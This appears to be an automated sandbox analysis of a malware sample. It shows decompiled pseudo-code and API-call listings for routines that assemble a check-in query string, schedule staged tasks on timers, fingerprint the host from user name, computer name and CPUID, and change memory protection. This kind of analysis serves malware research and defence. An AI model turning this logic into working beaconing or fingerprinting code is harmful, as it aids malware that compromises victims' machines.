                               • Uniqueness Score: -1.00%
                              APIs
                              • NtQueryInformationProcess.NTDLL(00000000,053CB24B,00000018,00000000,053F0460), ref: 053E4599
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: InformationProcessQuery
                              • String ID:
                              • API String ID: 1778838933-0
                              • Opcode ID: 0fc803fabdbbbe1cb7504842dec17b34cdf258960085cb016b77a51a8ef95e5d
                              • Instruction ID: 780798e0737947d14f7f34a682552083788d179bd762b0b29a6702711f73f572
                              • Opcode Fuzzy Hash: 0fc803fabdbbbe1cb7504842dec17b34cdf258960085cb016b77a51a8ef95e5d
                              • Instruction Fuzzy Hash: CDF03A313001269BCB20CA59C845DAABBE8EB09754B108514E901DB6D1D7B0E90ACBE0
                               Uniqueness
                               • Uniqueness Score: -1.00%
                              C-Code - Quality: 64%
                              			E049D6367(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16, void* _a24, intOrPtr _a32, void* _a40) {
                              				void* _v0;
                              				intOrPtr _v4;
                              				intOrPtr _v12;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				void* _v48;
                              				intOrPtr _v52;
                              				void* __edi;
                              				long _t30;
                              				intOrPtr _t31;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				intOrPtr _t35;
                              				void* _t38;
                              				intOrPtr _t39;
                              				int _t42;
                              				intOrPtr _t43;
                              				intOrPtr _t44;
                              				intOrPtr _t46;
                              				void* _t49;
                              				intOrPtr _t53;
                              				intOrPtr _t57;
                              				intOrPtr* _t59;
                              				intOrPtr _t65;
                              				intOrPtr _t71;
                              				intOrPtr _t74;
                              				intOrPtr _t78;
                              				int _t81;
                              				void* _t83;
                              				void* _t84;
                              				void* _t88;
                              				intOrPtr _t90;
                              				long _t92;
                              				intOrPtr* _t93;
                              				intOrPtr* _t94;
                              				int _t95;
                              				void* _t96;
                              				void* _t97;
                              				void* _t100;
                              				void* _t102;
                              
                               				_t88 = __edx;
                               				_t84 = __ecx;
                               				_t30 = __eax;
                               				_t100 =  &_v12;
                               				_t83 = _a16;
                               				_v4 = 8;
                               				if(__eax == 0) {
                               					_t30 = GetTickCount(); // no caller-supplied value: the tick count becomes the last wsprintfA argument
                               				}
                               				// four configuration DWORDs are byte-swapped so they are formatted in big-endian byte order
                               				_t31 =  *0x49dd018; // 0x9945a377
                               				asm("bswap eax");
                               				_t32 =  *0x49dd014; // 0x3a87c8cd
                               				asm("bswap eax");
                               				_t33 =  *0x49dd010; // 0xd8d2f808
                               				asm("bswap eax");
                               				_t34 =  *0x49dd00c; // 0x13d015ef
                               				asm("bswap eax");
                               				_t35 =  *0x49dd2b8; // 0xe3a5a8
                               				// format strings are addressed relative to *0x49dd2b8; the annotated DWORD is the string's
                               				// first four bytes in little-endian order: 0x74666f73 = "soft"
                               				_t3 = _t35 + 0x49de633; // 0x74666f73
                               				_t95 = wsprintfA(_t83, _t3, 2, 0x3f87e, _t34, _t33, _t32, _t31,  *0x49dd02c,  *0x49dd004, _t30);
                               				_t38 = E049D8DA6();
                               				_t39 =  *0x49dd2b8; // 0xe3a5a8
                               				_t4 = _t39 + 0x49de673; // 0x74707526 = "&upt"
                               				_t42 = wsprintfA(_t95 + _t83, _t4, _t38); // appended at the running length _t95 of the buffer _t83
                               				_t102 = _t100 + 0x38;
                               				_t96 = _t95 + _t42; // executed
                               				_t43 = E049D40AC(_t84); // executed
                               				_a32 = _t43;
                               				if(_t43 != 0) {
                               					_t78 =  *0x49dd2b8; // 0xe3a5a8
                               					_t7 = _t78 + 0x49de8b2; // 0x736e6426 = "&dns"
                               					_t81 = wsprintfA(_t96 + _t83, _t7, _t43);
                               					_t102 = _t102 + 0xc;
                               					_t96 = _t96 + _t81;
                               					HeapFree( *0x49dd270, 0, _a40); // *0x49dd270 is the heap handle used by every allocation in this function
                               				}
                               				_t44 = E049D8941();
                               				_a32 = _t44;
                               				if(_t44 != 0) {
                               					_t74 =  *0x49dd2b8; // 0xe3a5a8
                               					_t11 = _t74 + 0x49de885; // 0x6f687726 = "&who"
                               					wsprintfA(_t96 + _t83, _t11, _t44);
                               					HeapFree( *0x49dd270, 0, _a40);
                               				}
                               				_t90 =  *0x49dd35c; // 0x58195b0
                               				_t46 = E049D3FB8(0x49dd00a, _t90 + 4);
                               				_t92 = 0;
                               				_a8 = _t46;
                               				if(_t46 != 0) {
                               					_t49 = RtlAllocateHeap( *0x49dd270, 0, 0x800); // executed
                               					_a24 = _t49;
                               					if(_t49 != 0) {
                               						E049D47EF(GetTickCount());
                               						_t53 =  *0x49dd35c; // 0x58195b0
                               						__imp__(_t53 + 0x40); // RtlEnterCriticalSection (API list, ref 049D64AB)
                               						asm("lock xadd [eax], ecx"); // interlocked add on a counter of the shared global object
                               						_t57 =  *0x49dd35c; // 0x58195b0
                               						__imp__(_t57 + 0x40); // RtlLeaveCriticalSection (API list, ref 049D64C9)
                               						_t59 =  *0x49dd35c; // 0x58195b0
                               						_t97 = E049DA7FB(1, _t88, _t83,  *_t59); // builds a string with strcpy/lstrcat and trims "=" (see subcall APIs)
                               						asm("lock xadd [eax], ecx"); // second interlocked add on the same counter
                               						if(_t97 != 0) {
                               							StrTrimA(_t97, 0x49dc2ac);
                               							_push(_t97);
                               							_t65 = E049D6F6D();
                               							_v20 = _t65;
                               							if(_t65 != 0) {
                               								_t93 = __imp__; // lstrcpy (API list, refs 049D651A and 049D6524)
                               								 *_t93(_t97, _v0);
                               								 *_t93(_a4, _v20);
                               								_t94 = __imp__; // lstrcat (API list, refs 049D6534 and 049D653B)
                               								 *_t94(_v4, _v32);
                               								 *_t94(_v12, _t97);
                               								// E049D3B55 consumes the assembled strings; a result of 0x10d2 is tolerated,
                               								// any other non-zero result triggers E049D55F1
                               								_t71 = E049D3B55(0xffffffffffffffff, _v20, _v28, _v24); // executed
                               								_v52 = _t71;
                               								if(_t71 != 0 && _t71 != 0x10d2) {
                               									E049D55F1();
                               								}
                               								RtlFreeHeap( *0x49dd270, 0, _v48); // executed
                               								_t92 = 0;
                               							}
                               							HeapFree( *0x49dd270, _t92, _t97);
                               						}
                               						RtlFreeHeap( *0x49dd270, _t92, _a16); // executed
                               					}
                               					HeapFree( *0x49dd270, _t92, _v0);
                               				}
                               				RtlFreeHeap( *0x49dd270, _t92, _t83); // executed
                               				return _a4;
                               			}
                               Instruction addresses for the statements above, in order:
                               0x049d6367, 0x049d6367, 0x049d6367, 0x049d6367, 0x049d636d, 0x049d6374, 0x049d637c, 0x049d637e, 0x049d637e, 0x049d638b,
                               0x049d6396, 0x049d6399, 0x049d63a4, 0x049d63a7, 0x049d63ac, 0x049d63af, 0x049d63b4, 0x049d63b7, 0x049d63c3, 0x049d63d0,
                               0x049d63d2, 0x049d63d8, 0x049d63dd, 0x049d63e8, 0x049d63ea, 0x049d63ed, 0x049d63ef, 0x049d63fc, 0x049d6400, 0x049d6403,
                               0x049d6408, 0x049d6413, 0x049d6415, 0x049d641c, 0x049d6426, 0x049d6426, 0x049d6428, 0x049d642f, 0x049d6433, 0x049d6436,
                               0x049d643b, 0x049d6445, 0x049d6456, 0x049d6456, 0x049d6458, 0x049d6466, 0x049d646b, 0x049d646f, 0x049d6473, 0x049d6485,
                               0x049d648d, 0x049d6491, 0x049d649d, 0x049d64a2, 0x049d64ab, 0x049d64bc, 0x049d64c0, 0x049d64c9, 0x049d64cf, 0x049d64dc,
                               0x049d64e9, 0x049d64ef, 0x049d64fb, 0x049d6501, 0x049d6502, 0x049d6509, 0x049d650d, 0x049d6513, 0x049d651a, 0x049d6524,
                               0x049d652a, 0x049d6534, 0x049d653b, 0x049d6549, 0x049d6550, 0x049d6554, 0x049d655d, 0x049d655d, 0x049d656e, 0x049d6570,
                               0x049d6570, 0x049d657a, 0x049d657a, 0x049d6587, 0x049d6587, 0x049d6594, 0x049d6594, 0x049d659e, 0x049d65ab

                              APIs
                              • GetTickCount.KERNEL32 ref: 049D637E
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,?,?,74785520,049D64DC,?,058195B0), ref: 049DA826
                                • Part of subcall function 049DA7FB: lstrlen.KERNEL32(?,?,74785520,049D64DC,?,058195B0), ref: 049DA82E
                                • Part of subcall function 049DA7FB: strcpy.NTDLL ref: 049DA845
                                • Part of subcall function 049DA7FB: lstrcat.KERNEL32(00000000,?), ref: 049DA850
                                • Part of subcall function 049DA7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,049D64DC,?,74785520,049D64DC,?,058195B0), ref: 049DA86D
                              • wsprintfA.USER32 ref: 049D63CB
                              • wsprintfA.USER32 ref: 049D63E8
                              • wsprintfA.USER32 ref: 049D6413
                              • HeapFree.KERNEL32(00000000,?), ref: 049D6426
                              • wsprintfA.USER32 ref: 049D6445
                              • HeapFree.KERNEL32(00000000,?), ref: 049D6456
                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049D6485
                              • GetTickCount.KERNEL32 ref: 049D6497
                              • RtlEnterCriticalSection.NTDLL(05819570), ref: 049D64AB
                              • RtlLeaveCriticalSection.NTDLL(05819570), ref: 049D64C9
                              • StrTrimA.SHLWAPI(00000000,049DC2AC,?,058195B0), ref: 049D64FB
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(05819B58,00000000,00000000,?,049D6507,00000000), ref: 049D6F7D
                                • Part of subcall function 049D6F6D: lstrlen.KERNEL32(?), ref: 049D6F85
                                • Part of subcall function 049D6F6D: lstrcpy.KERNEL32(00000000,05819B58), ref: 049D6F99
                                • Part of subcall function 049D6F6D: lstrcat.KERNEL32(00000000,?), ref: 049D6FA4
                              • lstrcpy.KERNEL32(00000000,?), ref: 049D651A
                              • lstrcpy.KERNEL32(?,?), ref: 049D6524
                              • lstrcat.KERNEL32(?,?), ref: 049D6534
                              • lstrcat.KERNEL32(?,00000000), ref: 049D653B
                              • RtlFreeHeap.NTDLL(00000000,?,?,?,?), ref: 049D656E
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 049D657A
                              • RtlFreeHeap.NTDLL(00000000,?,?,058195B0), ref: 049D6587
                              • HeapFree.KERNEL32(00000000,?), ref: 049D6594
                              • RtlFreeHeap.NTDLL(00000000,?), ref: 049D659E
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$Free$lstrcatlstrlenwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                              • String ID: Uxt
                              • API String ID: 1384543093-1536154274
                              • Opcode ID: 73d8ec9f746056590fe39d272aacdbfe3506b1c633804b28e00ca8f5e410db30
                              • Instruction ID: ead499d8d7bf53be8b233e4c99148755944bf8b7823ac5014c38fae080d9bff7
                              • Opcode Fuzzy Hash: 73d8ec9f746056590fe39d272aacdbfe3506b1c633804b28e00ca8f5e410db30
                              • Instruction Fuzzy Hash: 58519E71509204AFEB11AF69EC44E6ABFE9FF88304F054635F548D2160CB39ED95CB61
                               Uniqueness
                               • Uniqueness Score: -1.00%
                              C-Code - Quality: 83%
                              			E049D5038(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                              				void _v48;
                              				long _v52;
                              				struct %anon52 _v60;
                              				char _v72;
                              				long _v76;
                              				void* _v80;
                              				union _LARGE_INTEGER _v84;
                              				struct %anon52 _v92;
                              				void* _v96;
                              				void* _v100;
                              				union _LARGE_INTEGER _v104;
                              				long _v108;
                              				intOrPtr _v120;
                              				struct %anon52 _v128;
                              				struct %anon52 _t46;
                              				void* _t51;
                              				long _t53;
                              				void* _t54;
                              				struct %anon52 _t60;
                              				long _t64;
                              				struct %anon52 _t65;
                              				intOrPtr _t67;
                              				void* _t68;
                              				void* _t72;
                              				signed int _t73;
                              				void* _t75;
                              				void* _t78;
                              				void** _t82;
                              				signed int _t86;
                              				void* _t89;
                              
                               				_t75 = __edx;
                               				_v52 = 0;
                               				memset( &_v48, 0, 0x2c);
                               				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                               				_t46 = CreateWaitableTimerA(0, 1, 0); // unnamed manual-reset timer
                               				_v60 = _t46;
                               				if(_t46 == 0) {
                               					_v92.HighPart = GetLastError();
                               				} else {
                               					// the pushed pair 0xffffffff:0xff676980 is the 64-bit value -10,000,000, i.e. one second as a
                               					// negative (relative) SetWaitableTimer due time in 100 ns units; it is passed to L049DB030 with the
                               					// configuration DWORD *0x49dd278. L049DB030 is not resolved on this page; if it is the 64-bit
                               					// multiply helper (an assumption), the timer fires after *0x49dd278 seconds.
                               					_push(0xffffffff);
                               					_push(0xff676980);
                               					_push(0);
                               					_push( *0x49dd278);
                               					_v76 = 0;
                               					_v80 = 0;
                               					L049DB030();
                               					_v84.LowPart = _t46;
                               					_v80 = _t75;
                               					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                               					_t51 =  *0x49dd2a4; // 0x2e0
                               					_v76 = _t51; // second handle of the wait array: the global handle 0x2e0
                               					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff); // either handle, no timeout
                               					_v108 = _t53;
                               					if(_t53 == 0) { // WAIT_OBJECT_0: run one cycle; any other result falls through to the cleanup at L12
                               						if(_a8 != 0) {
                               							L4:
                               							 *0x49dd284 = 5;
                               						} else {
                               							_t68 = E049D4C56(_t75); // executed
                               							if(_t68 != 0) {
                               								goto L4;
                               							}
                               						}
                               						_v104.LowPart = 0; // stage counter: stages 0..2 go through E049D5B5B, stage 3 through E049D6006
                               						L6:
                               						if(_v104.LowPart == 1 && ( *0x49dd298 & 0x00000001) == 0) {
                               							_v104.LowPart = 2; // stage 1 runs only when bit 0 of the configuration flags *0x49dd298 is set
                               						}
                               						_t73 = _v104.LowPart;
                               						_t58 = _t73 << 4;
                               						_t78 = _t89 + (_t73 << 4) + 0x3c; // 16-byte per-stage slot on the stack
                               						_t74 = _t73 + 1;
                               						_v92.LowPart = _t73 + 1;
                               						_t60 = E049D5B5B(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                               						_v128.LowPart = _t60;
                               						if(_t60 != 0) {
                               							goto L17; // non-zero result: error handling below
                               						}
                               						_t65 = _v92;
                               						_t97 = _t65 - 3;
                               						_v104.LowPart = _t65;
                               						if(_t65 != 3) {
                               							goto L6;
                               						} else {
                               							_t67 = E049D6006(_t74, _t97,  &_v72, _a4, _a8); // executed
                               							_v120 = _t67;
                               						}
                               						goto L12;
                               						L17:
                               						__eflags = _t60 - 0x10d2;
                               						if(_t60 != 0x10d2) {
                               							// any other error: re-arm the timer with the one-second base scaled by *0x49dd27c
                               							_push(0xffffffff);
                               							_push(0xff676980);
                               							_push(0);
                               							_push( *0x49dd27c);
                               							goto L21;
                               						} else {
                               							__eflags =  *0x49dd280; // 0x0
                               							if(__eflags == 0) {
                               								goto L12;
                               							} else {
                               								// result 0x10d2 with *0x49dd280 set: run E049D55F1, then re-arm with 0xffffffff:0xdc3cba00 =
                               								// -600,000,000 (60 seconds) scaled by *0x49dd280, under the same multiply assumption
                               								_t60 = E049D55F1();
                               								_push(0xffffffff);
                               								_push(0xdc3cba00);
                               								_push(0);
                               								_push( *0x49dd280);
                               								L21:
                               								L049DB030();
                               								_v104.LowPart = _t60;
                               								_v100 = _t78;
                               								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                               								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                               								__eflags = _t64;
                               								_v128 = _t64;
                               								if(_t64 == 0) {
                               									goto L6; // index 0 signalled: restart the stage loop
                               								} else {
                               									goto L12;
                               								}
                               							}
                               						}
                               						L25:
                               					}
                               					L12:
                               					_t82 =  &_v72;
                               					_t72 = 3;
                               					do { // free the three heap pointers stored 16 bytes apart starting at _v72
                               						_t54 =  *_t82;
                               						if(_t54 != 0) {
                               							RtlFreeHeap( *0x49dd270, 0, _t54); // executed
                               						}
                               						_t82 =  &(_t82[4]);
                               						_t72 = _t72 - 1;
                               					} while (_t72 != 0);
                               					CloseHandle(_v80);
                               				}
                               				return _v92.HighPart;
                               				goto L25;
                               			}
                               Instruction addresses for the statements above, in order (0x00000000 marks a line with no code):
                               0x049d5038, 0x049d504e, 0x049d5052, 0x049d5057, 0x049d505e, 0x049d5066, 0x049d506a, 0x049d51f2, 0x049d5070, 0x049d5070,
                               0x049d5072, 0x049d5077, 0x049d5078, 0x049d507e, 0x049d5082, 0x049d5086, 0x049d5094, 0x049d50a2, 0x049d50a6, 0x049d50a8,
                               0x049d50b5, 0x049d50c1, 0x049d50c5, 0x049d50c9, 0x049d50d2, 0x049d50dd, 0x049d50dd, 0x049d50d4, 0x049d50d4, 0x049d50db,
                               0x00000000, 0x00000000, 0x049d50db, 0x049d50e7, 0x00000000, 0x049d50eb, 0x049d50f0, 0x049d50fb, 0x049d50fb, 0x049d5103,
                               0x049d510e, 0x049d5116, 0x049d511f, 0x049d5122, 0x049d5126, 0x049d512d, 0x049d5131, 0x00000000, 0x00000000, 0x049d5133,
                               0x049d5137, 0x049d513a, 0x049d513e, 0x00000000, 0x049d5140, 0x049d514b, 0x049d5150, 0x049d5150, 0x00000000, 0x049d5181,
                               0x049d5181, 0x049d5186, 0x049d51a5, 0x049d51a7, 0x049d51ac, 0x049d51ad, 0x00000000, 0x049d5188, 0x049d5188, 0x049d518e,
                               0x00000000, 0x049d5190, 0x049d5190, 0x049d5195, 0x049d5197, 0x049d519c, 0x049d519d, 0x049d51b3, 0x049d51b3, 0x049d51bb,
                               0x049d51c9, 0x049d51cd, 0x049d51d9, 0x049d51db, 0x049d51dd, 0x049d51e1, 0x00000000, 0x049d51e7, 0x00000000, 0x049d51e7,
                               0x049d51e1, 0x049d518e, 0x00000000, 0x049d5186, 0x049d5154, 0x049d5156, 0x049d515a, 0x049d515b, 0x049d515b, 0x049d515f,
                               0x049d5169, 0x049d5169, 0x049d516f, 0x049d5172, 0x049d5172, 0x049d5179, 0x049d5179, 0x049d5200, 0x00000000

                              APIs
                              • memset.NTDLL ref: 049D5052
                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 049D505E
                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049D5086
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 049D50A6
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,049D5A39,?), ref: 049D50C1
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,049D5A39,?,00000000), ref: 049D5169
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049D5A39,?,00000000,?,?), ref: 049D5179
                              • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 049D51B3
                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 049D51CD
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049D51D9
                                • Part of subcall function 049D4C56: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058193B8,00000000,?,747DF710,00000000,747DF730), ref: 049D4CA5
                                • Part of subcall function 049D4C56: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058193F0,?,00000000,30314549,00000014,004F0053,058193AC), ref: 049D4D42
                                • Part of subcall function 049D4C56: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049D50D9), ref: 049D4D54
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049D5A39,?,00000000,?,?), ref: 049D51EC
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                              • String ID: Uxt
                              • API String ID: 3521023985-1536154274
                              • Opcode ID: c2f414eba09d87ef3ca659c62740e3272db03b02166e32903df8cea0ea79af65
                              • Instruction ID: 5c9d6bad5d659ce8816e642ab411ed38796e4e04d9cd96f058fe9d77a2c0b5fa
                              • Opcode Fuzzy Hash: c2f414eba09d87ef3ca659c62740e3272db03b02166e32903df8cea0ea79af65
                              • Instruction Fuzzy Hash: C1514BB1409311BFDB109F15DC44D9BBFECEF89768F108A2AF56492190D774E944CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E22D3
                              • RtlDeleteCriticalSection.NTDLL(053F0440), ref: 053E2306
                              • RtlDeleteCriticalSection.NTDLL(053F0460), ref: 053E230D
                              • ReleaseMutex.KERNEL32(000007D0,00000000,?,?,?,053E2516), ref: 053E2335
                              • CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2341
                              • ResetEvent.KERNEL32(00000000,00000000,?,?,?,053E2516), ref: 053E234D
                              • CloseHandle.KERNEL32(?,?,053E2516), ref: 053E2359
                              • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,053E2516), ref: 053E235F
                              • SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E2373
                              • HeapFree.KERNEL32(00000000,00000000,?,?,053E2516), ref: 053E2396
                              • RtlRemoveVectoredExceptionHandler.NTDLL(04AD05B8), ref: 053E23D0
                              • SleepEx.KERNEL32(00000064,00000001,?,?,053E2516), ref: 053E23DF
                              • CloseHandle.KERNEL32(064FF048,?,?,053E2516), ref: 053E2406
                              • LocalFree.KERNEL32(?,?,053E2516), ref: 053E2416
                                • Part of subcall function 053D4132: GetVersion.KERNEL32(?,00000000,747DF720,?,053E22C4,00000000,?,?,?,053E2516), ref: 053D4156
                                • Part of subcall function 053D4132: GetModuleHandleA.KERNEL32(?,064F9723,?,053E22C4,00000000,?,?,?,053E2516), ref: 053D4173
                                • Part of subcall function 053D4132: GetProcAddress.KERNEL32(00000000), ref: 053D417A
                                • Part of subcall function 053E3BE1: RtlEnterCriticalSection.NTDLL(053F0460), ref: 053E3BEB
                                • Part of subcall function 053E3BE1: RtlLeaveCriticalSection.NTDLL(053F0460), ref: 053E3C27
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                              • String ID:
                              • API String ID: 1765366784-0
                              • Opcode ID: eb0dc9e0854f7b06fd7a76d86f910d511ac1326847cefafa817ff04c13f409e3
                              • Instruction ID: e39d5746ed77aeb6e08099c82c028d0ea9cea3a30f6d84988209de55ea60b243
                              • Opcode Fuzzy Hash: eb0dc9e0854f7b06fd7a76d86f910d511ac1326847cefafa817ff04c13f409e3
                              • Instruction Fuzzy Hash: FE415039654215ABDB25AFACEC8E95A7BEEB700705F550425F603DB192CFB19C408F20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E049DA303(char __eax, signed int* __esi) {
                              				long _v8;
                              				char _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v28;
                              				long _t34;
                              				signed int _t39;
                              				long _t50;
                              				char _t59;
                              				intOrPtr _t61;
                              				void* _t62;
                              				void* _t63;
                              				signed int* _t64;
                              				char _t65;
                              				intOrPtr* _t67;
                              				void* _t68;
                              				signed int* _t69;
                              
                              				_t69 = __esi;
                              				_t65 = __eax;
                              				_v8 = 0;
                              				_v12 = __eax;
                              				if(__eax == 0) {
                              					_t59 =  *0x49dd2a8; // 0xd448b889
                              					_v12 = _t59;
                              				}
                              				_t64 = _t69;
                              				E049D7855( &_v12, _t64);
                              				if(_t65 != 0) {
                              					 *_t69 =  *_t69 ^  *0x49dd2b4 ^ 0x46d76429;
                              				} else {
                              					GetUserNameW(0,  &_v8); // executed
                              					_t50 = _v8;
                              					if(_t50 != 0) {
                              						_t62 = RtlAllocateHeap( *0x49dd270, 0, _t50 + _t50);
                              						if(_t62 != 0) {
                              							if(GetUserNameW(_t62,  &_v8) != 0) {
                              								_t63 = _t62;
                              								 *_t69 =  *_t69 ^ E049D47A4(_v8 + _v8, _t63);
                              							}
                              							HeapFree( *0x49dd270, 0, _t62);
                              						}
                              					}
                              				}
                              				_t61 = __imp__;
                              				_v8 = _v8 & 0x00000000;
                              				GetComputerNameW(0,  &_v8);
                              				_t34 = _v8;
                              				if(_t34 != 0) {
                              					_t68 = RtlAllocateHeap( *0x49dd270, 0, _t34 + _t34);
                              					if(_t68 != 0) {
                              						if(GetComputerNameW(_t68,  &_v8) != 0) {
                              							_t63 = _t68;
                              							_t69[3] = _t69[3] ^ E049D47A4(_v8 + _v8, _t63);
                              						}
                              						HeapFree( *0x49dd270, 0, _t68);
                              					}
                              				}
                              				asm("cpuid");
                              				_t67 =  &_v28;
                              				 *_t67 = 1;
                              				 *((intOrPtr*)(_t67 + 4)) = _t61;
                              				 *(_t67 + 8) = _t63;
                              				 *(_t67 + 0xc) = _t64;
                              				_t39 = _v16 ^ _v20 ^ _v28;
                              				_t69[1] = _t69[1] ^ _t39;
                              				return _t39;
                              			}


                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 049DA33A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 049DA351
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 049DA35E
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049DA37F
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049DA3A6
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 049DA3BA
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 049DA3C7
                              • HeapFree.KERNEL32(00000000,00000000), ref: 049DA3E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: HeapName$AllocateComputerFreeUser
                              • String ID: Uxt
                              • API String ID: 3239747167-1536154274
                              • Opcode ID: 019a6c775aa443170eff6f474b9b2cb41624cafd5f54a5ebc0ac99dc7afdfbd1
                              • Instruction ID: 0ff27234fda482a1a6a07641aa241acb9615b14905d1f5f2dd992f4b52470c70
                              • Opcode Fuzzy Hash: 019a6c775aa443170eff6f474b9b2cb41624cafd5f54a5ebc0ac99dc7afdfbd1
                              • Instruction Fuzzy Hash: CF31F471A05209EFEB11DFA9D981A6EFBFAEB88300B118539E505E3240E734EE519B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(053EF4B4,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D13
                              • VirtualProtect.KERNEL32(00000000,00000000,00000040,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D25
                              • lstrcpy.KERNEL32(00000000,053EF4B4), ref: 053D4D34
                              • VirtualProtect.KERNEL32(00000000,00000000,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D45
                              • VirtualProtect.KERNEL32(?,00000005,00000040,-00000020,053EC508,00000018,053C35A8,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D7B
                              • VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4D96
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,053EC508,00000018,053C35A8,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DAB
                              • VirtualProtect.KERNEL32(?,00000004,00000040,-00000020,053EC508,00000018,053C35A8,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DD8
                              • VirtualProtect.KERNEL32(?,00000004,?,-00000020,?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DF2
                              • GetLastError.KERNEL32(?,00000000,?,053CB2DF,053EF4E4,?,?,00000004,00000000), ref: 053D4DF9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                              • String ID:
                              • API String ID: 3676034644-0
                              • Opcode ID: f6966ec16159e187c1e4d36edb4ae5da0a30fecccd048c2486c6f61c616fd60c
